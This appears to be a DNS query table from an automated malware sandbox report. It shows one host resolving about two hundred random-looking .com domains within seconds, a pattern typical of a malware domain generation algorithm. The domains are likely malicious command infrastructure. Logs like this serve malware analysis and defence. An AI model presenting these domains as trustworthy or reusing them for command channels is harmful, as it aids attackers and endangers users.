                                                                                                                                                                                                            Nov 11, 2024 18:08:29.619733095 CET192.168.2.91.1.1.10x690bStandard query (0)gacydes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.619930029 CET192.168.2.91.1.1.10xae62Standard query (0)gaqynih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.620286942 CET192.168.2.91.1.1.10x2692Standard query (0)puzypav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.620569944 CET192.168.2.91.1.1.10xf9f6Standard query (0)puvydyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.635329008 CET192.168.2.91.1.1.10x247dStandard query (0)lygylur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.635607958 CET192.168.2.91.1.1.10xacecStandard query (0)gadykyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.635853052 CET192.168.2.91.1.1.10xb35Standard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.635946989 CET192.168.2.91.1.1.10x20ebStandard query (0)pumybuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.636046886 CET192.168.2.91.1.1.10xd63eStandard query (0)lyvyver.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.636142969 CET192.168.2.91.1.1.10x4e22Standard query (0)vowymom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.636230946 CET192.168.2.91.1.1.10x6472Standard query (0)vonybuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.639811993 CET192.168.2.91.1.1.10x54ecStandard query (0)volypof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.643860102 CET192.168.2.91.1.1.10xde36Standard query (0)lyxysad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.647368908 CET192.168.2.91.1.1.10xe34bStandard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.647718906 CET192.168.2.91.1.1.10xaf9eStandard query (0)galypob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.647937059 CET192.168.2.91.1.1.10xb1a4Standard query (0)qeqyniq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.647937059 CET192.168.2.91.1.1.10xe1f2Standard query (0)vojyrum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.648114920 CET192.168.2.91.1.1.10x6dbeStandard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.648260117 CET192.168.2.91.1.1.10x228fStandard query (0)lykytin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:29.653224945 CET192.168.2.91.1.1.10x92c0Standard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.583267927 CET192.168.2.91.1.1.10xfeeaStandard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.583360910 CET192.168.2.91.1.1.10x610fStandard query (0)lysynur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.583904982 CET192.168.2.91.1.1.10xe7eStandard query (0)purydyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.585230112 CET192.168.2.91.1.1.10xf9b2Standard query (0)gacyzuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.586026907 CET192.168.2.91.1.1.10x5f24Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.587521076 CET192.168.2.91.1.1.10xb5bdStandard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.591276884 CET192.168.2.91.1.1.10xdb8Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.592360020 CET192.168.2.91.1.1.10x6849Standard query (0)lykyjad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.592674017 CET192.168.2.91.1.1.10xd07bStandard query (0)gaqydeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.595494986 CET192.168.2.91.1.1.10x31e5Standard query (0)qekykev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.598092079 CET192.168.2.91.1.1.10x49bfStandard query (0)pujyjav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.626902103 CET192.168.2.91.1.1.10x4b08Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.628628969 CET192.168.2.91.1.1.10x34e8Standard query (0)qetyvep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.628897905 CET192.168.2.91.1.1.10x77e4Standard query (0)lyvytuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.632555008 CET192.168.2.91.1.1.10x7050Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.634089947 CET192.168.2.91.1.1.10xf441Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.639071941 CET192.168.2.91.1.1.10x171eStandard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.639533043 CET192.168.2.91.1.1.10x5154Standard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.639959097 CET192.168.2.91.1.1.10x75aeStandard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.640885115 CET192.168.2.91.1.1.10x98a1Standard query (0)puvyxil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.641201973 CET192.168.2.91.1.1.10x975fStandard query (0)qexylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.641360044 CET192.168.2.91.1.1.10x1f06Standard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.641561985 CET192.168.2.91.1.1.10x9834Standard query (0)lyryfyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.994143009 CET192.168.2.91.1.1.10xb108Standard query (0)vofymik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:30.997896910 CET192.168.2.91.1.1.10x139Standard query (0)pufymoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:31.003679991 CET192.168.2.91.1.1.10x20fdStandard query (0)lyxylux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:31.005295992 CET192.168.2.91.1.1.10xbc99Standard query (0)lygymoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:31.016289949 CET192.168.2.91.1.1.10xa577Standard query (0)vowydef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:31.041527987 CET192.168.2.91.1.1.10xfdb6Standard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:33.979903936 CET192.168.2.91.1.1.10x6ce3Standard query (0)galykes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.269212008 CET192.168.2.91.1.1.10x21efStandard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.296474934 CET192.168.2.91.1.1.10xbe3Standard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.329530954 CET192.168.2.91.1.1.10xa425Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.405514956 CET192.168.2.91.1.1.10xc687Standard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.485975981 CET192.168.2.91.1.1.10x745dStandard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.492626905 CET192.168.2.91.1.1.10xf0c3Standard query (0)qebytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.493206978 CET192.168.2.91.1.1.10x931cStandard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.493755102 CET192.168.2.91.1.1.10x1721Standard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.565619946 CET192.168.2.91.1.1.10xa3cbStandard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.613575935 CET192.168.2.91.1.1.10xf59Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.614253044 CET192.168.2.91.1.1.10x1ecbStandard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.615627050 CET192.168.2.91.1.1.10xce05Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.669079065 CET192.168.2.91.1.1.10x2946Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.669452906 CET192.168.2.91.1.1.10x9fadStandard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.669596910 CET192.168.2.91.1.1.10x4caStandard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.669742107 CET192.168.2.91.1.1.10x95eStandard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:35.743016958 CET192.168.2.91.1.1.10xb510Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:36.735742092 CET192.168.2.91.1.1.10x4caStandard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:36.735785961 CET192.168.2.91.1.1.10x9fadStandard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:36.735785961 CET192.168.2.91.1.1.10x2946Standard query (0)gatyvyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:40.894052982 CET192.168.2.91.1.1.10xd2d5Standard query (0)qedykep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:40.896764040 CET192.168.2.91.1.1.10x8e20Standard query (0)pupyjap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:41.076742887 CET192.168.2.91.1.1.10xd858Standard query (0)qexysev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:41.124114990 CET192.168.2.91.1.1.10xd7e5Standard query (0)ganyvyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:41.708825111 CET192.168.2.91.1.1.10xb73cStandard query (0)vonycaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:41.709378004 CET192.168.2.91.1.1.10xbfa6Standard query (0)lysygij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:41.710127115 CET192.168.2.91.1.1.10xe1aStandard query (0)lykywex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:41.785113096 CET192.168.2.91.1.1.10x9452Standard query (0)qedyhiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:41.820801020 CET192.168.2.91.1.1.10x623aStandard query (0)volyrut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:41.965454102 CET192.168.2.91.1.1.10x3b75Standard query (0)gaqyvys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.073108912 CET192.168.2.91.1.1.10xfca6Standard query (0)galyryz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.272505045 CET192.168.2.91.1.1.10x781bStandard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.280993938 CET192.168.2.91.1.1.10x7e5dStandard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.298043966 CET192.168.2.91.1.1.10xe0b8Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.306497097 CET192.168.2.91.1.1.10xc5Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.333702087 CET192.168.2.91.1.1.10x656fStandard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.337627888 CET192.168.2.91.1.1.10xa816Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.337821960 CET192.168.2.91.1.1.10x69dcStandard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.338311911 CET192.168.2.91.1.1.10x5480Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.357786894 CET192.168.2.91.1.1.10x198dStandard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.358637094 CET192.168.2.91.1.1.10x7d7Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.359215975 CET192.168.2.91.1.1.10xdd1Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.512492895 CET192.168.2.91.1.1.10x59a0Standard query (0)gahykeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.517250061 CET192.168.2.91.1.1.10x9653Standard query (0)puvycel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.517644882 CET192.168.2.91.1.1.10xbef3Standard query (0)vowyguf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.517855883 CET192.168.2.91.1.1.10x38d4Standard query (0)lysymor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.519895077 CET192.168.2.91.1.1.10x79daStandard query (0)qexytil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.524005890 CET192.168.2.91.1.1.10x475Standard query (0)gatyniz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.525473118 CET192.168.2.91.1.1.10x88adStandard query (0)pujylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.535084963 CET192.168.2.91.1.1.10x98e4Standard query (0)vopymit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.535593987 CET192.168.2.91.1.1.10xad6aStandard query (0)qebysaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.535959959 CET192.168.2.91.1.1.10xebf2Standard query (0)pupymol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.536499023 CET192.168.2.91.1.1.10xae3bStandard query (0)ganydeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.536669016 CET192.168.2.91.1.1.10x6ecaStandard query (0)vowybyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.536825895 CET192.168.2.91.1.1.10x457eStandard query (0)lyrynux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.536968946 CET192.168.2.91.1.1.10x3bdStandard query (0)purybup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.537023067 CET192.168.2.91.1.1.10x1a03Standard query (0)gahyruh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.540128946 CET192.168.2.91.1.1.10x2583Standard query (0)vocypok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.541814089 CET192.168.2.91.1.1.10xca1dStandard query (0)gacycaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.545032024 CET192.168.2.91.1.1.10xa078Standard query (0)qegykeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.545090914 CET192.168.2.91.1.1.10xa850Standard query (0)puvypoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.560173035 CET192.168.2.91.1.1.10xdd5Standard query (0)vopyguk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.562290907 CET192.168.2.91.1.1.10x936eStandard query (0)qeqyfug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.563476086 CET192.168.2.91.1.1.10xc3c6Standard query (0)puzytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.563695908 CET192.168.2.91.1.1.10x65fcStandard query (0)gadyhoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.564162016 CET192.168.2.91.1.1.10xe1f3Standard query (0)vofyjom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.564349890 CET192.168.2.91.1.1.10xfa22Standard query (0)qeqyvev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.564526081 CET192.168.2.91.1.1.10xb27cStandard query (0)gaqyfub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.564680099 CET192.168.2.91.1.1.10x6d6fStandard query (0)pufyjag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.564857960 CET192.168.2.91.1.1.10xe196Standard query (0)qegyryq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.565150023 CET192.168.2.91.1.1.10x7c79Standard query (0)lyrygid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.565417051 CET192.168.2.91.1.1.10x4c7aStandard query (0)vofyqek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.565588951 CET192.168.2.91.1.1.10xa9c0Standard query (0)puzyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.565743923 CET192.168.2.91.1.1.10x4ebcStandard query (0)purygiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.565891027 CET192.168.2.91.1.1.10x82ccStandard query (0)lymyfyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.566062927 CET192.168.2.91.1.1.10x9591Standard query (0)qexyxop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.566236019 CET192.168.2.91.1.1.10xf530Standard query (0)lygywyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.566426039 CET192.168.2.91.1.1.10xb02Standard query (0)pumydyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.566544056 CET192.168.2.91.1.1.10x36caStandard query (0)lyxytur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.566915989 CET192.168.2.91.1.1.10xdb2cStandard query (0)pufyweq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.567158937 CET192.168.2.91.1.1.10xf0b0Standard query (0)volyzic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.567393064 CET192.168.2.91.1.1.10x42ecStandard query (0)qekyluv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.567637920 CET192.168.2.91.1.1.10x64b8Standard query (0)lyxyxox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.568062067 CET192.168.2.91.1.1.10x5b7Standard query (0)gadyqaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.568208933 CET192.168.2.91.1.1.10xcef0Standard query (0)lykylud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.568398952 CET192.168.2.91.1.1.10xc14Standard query (0)vojykyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.568412066 CET192.168.2.91.1.1.10x3225Standard query (0)lyvysaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.580250025 CET192.168.2.91.1.1.10x6586Standard query (0)ganycob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.580872059 CET192.168.2.91.1.1.10x5419Standard query (0)qekyryp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.581070900 CET192.168.2.91.1.1.10xe093Standard query (0)lymyved.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.581543922 CET192.168.2.91.1.1.10x2002Standard query (0)vonydem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.581650972 CET192.168.2.91.1.1.10x8edStandard query (0)lygyjan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.581754923 CET192.168.2.91.1.1.10xce3dStandard query (0)vocycat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.581890106 CET192.168.2.91.1.1.10x99aaStandard query (0)gacypiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.594265938 CET192.168.2.91.1.1.10xebf8Standard query (0)pupyguq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.594449043 CET192.168.2.91.1.1.10x92c3Standard query (0)pumycav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.597031116 CET192.168.2.91.1.1.10x593dStandard query (0)qedyqal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.599186897 CET192.168.2.91.1.1.10x727aStandard query (0)galyzus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:42.616137981 CET192.168.2.91.1.1.10x54efStandard query (0)qetynup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.838057995 CET192.168.2.91.1.1.10x265dStandard query (0)pupybul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.838457108 CET192.168.2.91.1.1.10xb60aStandard query (0)qegyqaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.839376926 CET192.168.2.91.1.1.10xaea0Standard query (0)ganypih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.840536118 CET192.168.2.91.1.1.10x2d01Standard query (0)pumypog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.840636969 CET192.168.2.91.1.1.10xef10Standard query (0)volykyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.840821981 CET192.168.2.91.1.1.10xb52eStandard query (0)qedynul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.841221094 CET192.168.2.91.1.1.10x48b8Standard query (0)qeqysag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:43.842680931 CET192.168.2.91.1.1.10x13edStandard query (0)lymysan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:47.751359940 CET192.168.2.91.1.1.10x20a4Standard query (0)ganycob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.155383110 CET192.168.2.91.1.1.10x2eb2Standard query (0)gatyfuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.155822039 CET192.168.2.91.1.1.10xf5c6Standard query (0)pujywep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.155894041 CET192.168.2.91.1.1.10x81ceStandard query (0)qebyxog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.159490108 CET192.168.2.91.1.1.10xa75Standard query (0)pumypop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.161724091 CET192.168.2.91.1.1.10xabe3Standard query (0)lykyjar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.162848949 CET192.168.2.91.1.1.10x3d09Standard query (0)pupybyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.163932085 CET192.168.2.91.1.1.10xbacStandard query (0)gatyveh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.183475018 CET192.168.2.91.1.1.10x215eStandard query (0)purydel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.183510065 CET192.168.2.91.1.1.10xc2c2Standard query (0)vofymif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.183720112 CET192.168.2.91.1.1.10xf4edStandard query (0)qebytuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.183954000 CET192.168.2.91.1.1.10x9cd9Standard query (0)lyxylyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.184127092 CET192.168.2.91.1.1.10x8e83Standard query (0)pufymiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.187762022 CET192.168.2.91.1.1.10x2d3dStandard query (0)vojyjot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.196201086 CET192.168.2.91.1.1.10xd397Standard query (0)lyryvaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.200278997 CET192.168.2.91.1.1.10xe2d8Standard query (0)qetyfyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.205259085 CET192.168.2.91.1.1.10xfefdStandard query (0)vowycok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.208703995 CET192.168.2.91.1.1.10x8c01Standard query (0)qedyfyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.209131002 CET192.168.2.91.1.1.10xac0Standard query (0)galyqoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.209897041 CET192.168.2.91.1.1.10x95eeStandard query (0)gadyfys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.210527897 CET192.168.2.91.1.1.10x6e14Standard query (0)vofyguc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.212203979 CET192.168.2.91.1.1.10x92f3Standard query (0)gaqydaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.212513924 CET192.168.2.91.1.1.10xc5e4Standard query (0)galykew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.213995934 CET192.168.2.91.1.1.10x9579Standard query (0)purycaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.214868069 CET192.168.2.91.1.1.10xe5acStandard query (0)qegyhip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:48.215260983 CET192.168.2.91.1.1.10x941aStandard query (0)vocyryf.comA (IP address)IN (0x0001)false
